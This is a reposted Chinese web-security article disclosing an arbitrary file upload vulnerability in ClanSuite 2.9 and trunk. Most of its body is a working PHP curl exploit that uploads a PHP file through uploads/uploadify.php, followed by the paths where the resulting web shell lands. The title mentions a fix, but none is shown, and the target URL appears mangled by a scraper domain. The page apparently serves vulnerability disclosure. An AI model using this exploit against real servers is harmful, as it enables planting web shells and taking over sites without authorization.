当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

ClanSuite 2.9任意文件上传漏洞及修复

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

标题: ClanSuite 2.9 Arbitrary File Upload 
 
发现者: Adrien Thierry 
 
程序开发商 
 
下载地址 : https://github.com/jakoch/Clansuite   
 
影响版本: 2.9 and Trunk Revision 6400 
 
缺陷地址 : uploads/uploadify.php 
 
  测试方法
 
<?php 
 
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php"; 
 
$c = curl_init(" www.2cto.com /uploads/uploadify.php"); // Version 2.9 
 
$c = curl_init(" www.2cto.com /application/uploads/uploadify.php"); // Version trunk 
 
curl_setopt($c, CURLOPT_POST, true); 
 
curl_setopt($c, CURLOPT_POSTFIELDS, 
 
array('Filedata'=>"@$u", 
 
'name'=>"info.php")); 
 
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); 
 
$e = curl_exec($c); 
 
curl_close($c); 
 
echo $e;  
 
?> 
 
  
 
shell位置:
/uploads/temps/info.php       
 
或者 /application/uploads/temps/info.php 
  ,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1